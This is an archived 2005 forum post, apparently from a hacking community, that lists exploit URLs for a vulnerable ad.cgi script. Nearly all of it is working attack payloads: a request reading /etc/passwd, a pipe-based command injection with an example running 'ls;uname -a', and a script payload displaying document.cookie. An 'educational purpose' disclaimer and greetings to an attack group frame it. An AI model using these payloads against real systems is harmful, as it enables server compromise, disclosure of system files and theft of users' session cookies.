Remote Command Execution In Ad.cgi Script

qcred11

Apr 25 2005, 04:55 PM

QUOTE

remote command execution in ad.cgi script

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE

1)file showing
http://www.target.com/cgi-bin/ad.cgi?/etc/passwd

2)remote code execution
http://www.target.com/cgi-bin/ad.cgi?|command

3)CSS
www.target.com/cgi-bin/ad.cgi?<script>alert(document.cookie)</script>

ex:
http://www.target.com/cgi-bin/ad.cgi?|ls;uname -a;

greetz to all magattack members

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.